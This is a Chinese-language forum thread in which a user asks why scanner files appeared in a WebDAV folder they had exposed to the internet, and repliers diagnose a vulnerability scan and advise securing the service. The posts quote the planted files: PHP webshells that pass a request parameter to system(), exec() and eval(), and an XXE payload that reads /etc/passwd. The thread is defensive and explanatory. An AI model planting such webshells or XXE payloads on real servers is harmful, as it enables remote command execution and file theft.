V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
movq
V2EX  ›  程序员

[求助] 有无安全大佬,电脑突然出现奇怪的文件,里面显示一些 CVE-XXX 的信息,不知道是黑客入侵还是被扫洞程序扫到了

  •  
  •   movq · 2023-05-10 20:05:40 +08:00 · 2661 次点击
    这是一个创建于 558 天前的主题,其中的信息可能已经有所发展或是发生改变。

    我是使用了一个 webdav 程序,把我电脑 A 的某个文件夹 F 暴露挂载成了 webdav ,然后使用 http 方式,在另一台电脑 B 通过公网 IP 来访问

    昨天 F 文件夹里面里面突然出现下列文件夹:

    gHbz8tWnPvmTEVo

    打开之后,里面没发现有什么恶意程序,但是有很多网页,jsp 或者 php ,用文本编辑器打开里面就显示 CVExxx

    zMgVQJuK6esNL9o

    里面有个文件叫 nuclei.html.gif ,我去 github 搜索,发现是一个 projectdiscovery 的 repo 里面的代码

    HUSGPu6XoFtR1C5

    8qcYLBrAutgPFHk

    https://github.com/projectdiscovery/nuclei-templates

    Community curated list of templates for the nuclei engine to find security vulnerabilities.

    Nuclei is a fast, efficient, and extensible vulnerability scanner. It can scan thousands of hosts in just a few minutes. The nuclei engine uses text-file templates to define the steps required to detect a vulnerability.

    目前的怀疑:

    1. 某些扫洞程序扫到我的 webdav 了(但问题是 1 、他们是怎么做到在我的 webdav 文件夹添加文件的呢? 2 、在我的 webdav 文件夹放下这些文件的意义是什么呢)
    2. 有黑客入侵了电脑,但问题是我也没发现有什么勒索软件或者文件丢失啊?

    我的疑问:

    1. 如何确定自己的电脑有没有被入侵?
    2. 如果是被扫洞程序扫到了,这意味着是别人提醒我有漏洞,还是意味着什么呢?
    3. 大家觉得发生了什么?
    第 1 条附言  ·  2023-05-10 20:36:45 +08:00

    以下是所有的文件里面的内容:主要是PHP JSP文件

    里面大部分内容都是在echo,提示有CVE漏洞。

    我看比较严重的代码主要是和cmd相关的。这个应该意思是可以调用系统的终端然后执行某些程序?应该是如果这些php文件没有被执行就无大碍吧?

    PHP文件

    <?php echo md5('CVE-2022-25487');?>
    <%
    out.println("CVE-2022-26352");
    %>
    <?php echo md5('phpcollab_rce');?>
    POC_TEST
    <?php
    $cmd=$_GET['cmd'];
    system($cmd);
    ?>
      <?php
    echo exec($_GET["cmd"]);
    ?>
    <?php echo md5('CVE-2022-1952');?>
    <?php
    
    echo "File Upload success";
    <?php echo 'CVE-2021-24236'; ?>
    
    

    JSP文件

    <%@ page import="java.util.*,java.io.*"%>
    <%@ page import="java.security.MessageDigest"%>
    <%
    String cve = "CVE-2018-15961";
    MessageDigest alg = MessageDigest.getInstance("MD5");
    alg.reset();
    alg.update(cve.getBytes());
    byte[] digest = alg.digest();
    StringBuffer hashedpasswd = new StringBuffer();
    String hx;
    for (int i=0;i<digest.length;i++){
      hx =  Integer.toHexString(0xFF & digest[i]);
      if(hx.length() == 1){hx = "0" + hx;}
      hashedpasswd.append(hx);
    }
    out.println(hashedpasswd.toString());
    %>
    
    <%@ page import="java.util.*,java.io.*"%>
    <%@ page import="java.security.MessageDigest"%>
    
    <%
    String cve = "CVE-2018-2894";
    MessageDigest alg = MessageDigest.getInstance("MD5");
    alg.reset();
    alg.update(cve.getBytes());
    byte[] digest = alg.digest();
    StringBuffer hashedpasswd = new StringBuffer();
    String hx;
    for (int i=0;i<digest.length;i++){
      hx =  Integer.toHexString(0xFF & digest[i]);
      //0x03 is equal to 0x3, but we need 0x03 for our md5sum
      if(hx.length() == 1){hx = "0" + hx;}
      hashedpasswd.append(hx);
    }
    
    out.println(hashedpasswd.toString());
    %>
    
    第 2 条附言  ·  2023-05-10 20:37:08 +08:00

    接着第一条附言没贴完的代码(字数限制)

    XML文件

    <?xml version='1.0' encoding='UTF-8'?>
        <ChartData>
          <Categories>
            <Category>ALttP</Category>
          </Categories>
          <Series label="2PXwFeEsfjzIPlN8BfkLn1ATkhX">
            <Point>
              <Value type="y">12345</Value>
            </Point>
          </Series>
        </ChartData>
    
    <?xml version='1.0' encoding='UTF-8'?>
        <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]>
        <SAPChartCustomizing version="1.1">
          <Elements>
            <ChartElements>
              <Title>
                <Extension>&xxe;</Extension>
              </Title>
            </ChartElements>
          </Elements>
        </SAPChartCustomizing>
    

    文本文件

    MyPasswdNewData->/api/tomcat
    POC_TEST
    CVE-2020-12800-2PXwFlCcbD1a74LOgwnlRWVnJzD
    
    21 条回复    2023-05-11 17:27:24 +08:00
    INTEL2333
        1
    INTEL2333  
       2023-05-10 20:10:59 +08:00
    unknowsll
        2
    unknowsll  
       2023-05-10 20:12:12 +08:00   ❤️ 1
    你放公网的东西被扫到了,加一下验证吧,上面有一条最简单的 php 小马,如果成了,后续会有大马继续进来,请尽快处理此服务,或者限制来源 IP
    <?php eval(@$_POST['a']); ?>
    unknowsll
        3
    unknowsll  
       2023-05-10 20:14:59 +08:00
    MD5 注入可以了解一下。
    movq
        4
    movq  
    OP
       2023-05-10 20:16:35 +08:00
    billlee
        5
    billlee  
       2023-05-10 20:18:44 +08:00 via Android
    你的 webdav 被扫到并且被破解了密码(或者你根本没设置密码),然后那个人上传了一个 php 后门。当然如果你这个 webdav 服务是纯粹的 webdav, 不包含 php 解释器,那这个后门是无法运行的。
    movq
        6
    movq  
    OP
       2023-05-10 20:26:10 +08:00
    @billlee 我是 mac 直接使用 appstore 下载的一个 app ,这个 app 提供了 webdav 功能。不太知道这个 app 本身有没有 php 解释器
    dode
        7
    dode  
       2023-05-10 20:29:07 +08:00
    这可能类似善良黑客给你提示,管理员需要尽快处理
    jackyzy823
        8
    jackyzy823  
       2023-05-10 20:30:04 +08:00 via Android
    被扫描了,Webdav PUT 方法不就会创建文件么…
    SunsetShimmer
        9
    SunsetShimmer  
       2023-05-10 20:37:08 +08:00
    被上传 PHP 后门,如果没有 PHP 环境,没用。

    但不管怎么说把存储公开到公网都不太好...
    movq
        10
    movq  
    OP
       2023-05-10 20:37:48 +08:00
    @SunsetShimmer 意思是如果没有程序主动执行我 webdav 里面的 php 文件就没事吗?
    movq
        11
    movq  
    OP
       2023-05-10 20:50:32 +08:00
    @billlee
    @SunsetShimmer 我不太懂 php ,但是我知道 tomcat 里面是直接上传文件到 webapp 就会被自动运行。你们的意思是如果 php 文件被自动上传到某个目录,也会和 tomcat 运行 java web 程序一样被自动运行,这个意思吗?

    但我这里面这些 php 文件都是在我的 webdav 根目录。我 webdav 只用于存储文件,没有配置什么服务,应该就没问题了吧?
    billlee
        12
    billlee  
       2023-05-10 20:59:21 +08:00
    是的,要有程序去执行它。php 和 jsp 是 apache/tomcat 在收到 web 请求的时候会自动执行 web 目录下的对应脚本。如果是纯粹的 http 静态文件服务器,那是无法执行的。专门的 webdav app 大概率是没有 php 解释器的。
    patrickyoung
        13
    patrickyoung  
       2023-05-10 21:22:46 +08:00 via iPhone
    @movq #11 依然有问题,如果服务器在国内的或者被用来在国内的人身上的话,你想想攻击者在你这传个菠菜 /黄赌毒然后引用一下这个资源,你会怎么样?
    darknoll
        14
    darknoll  
       2023-05-11 10:37:09 +08:00
    你 webdav 没有设置密码?
    xiaopigfly
        15
    xiaopigfly  
       2023-05-11 11:37:45 +08:00
    先赶紧把公网停掉,再排查是否解析 php 文件。如果解析大概率被入侵了。
    movq
        16
    movq  
    OP
       2023-05-11 14:34:51 +08:00
    @darknoll 有密码, 但网上查了下有的 webdav 攻击方式不需要密码
    yumusb
        17
    yumusb  
       2023-05-11 14:40:59 +08:00
    可以直接 尝试 PUT 文件到你的服务器,看看是否能够成功上传。
    cquan
        18
    cquan  
       2023-05-11 15:02:28 +08:00
    CVE+数字是漏洞编号,你这个项目有漏洞,它应该是用软件批量扫描的,赶紧修复吧
    movq
        19
    movq  
    OP
       2023-05-11 15:06:02 +08:00
    @yumusb 感觉是 webdav 的 app 内部有漏洞,这些漏洞可以直接免密码上传文件进行攻击
    movq
        20
    movq  
    OP
       2023-05-11 15:07:16 +08:00
    @cquan 就是不知道是黑客来攻击我的电脑,还是有白帽子专门扫洞提醒别人,感觉很奇怪。我看了下文件夹,没有被修改过(因为 last modified time 都比这些扫洞文件的创建时间早)
    kir4
        21
    kir4  
       2023-05-11 17:27:24 +08:00
    基本可以确定是扫描器行为
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3591 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 04:42 · PVG 12:42 · LAX 20:42 · JFK 23:42
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.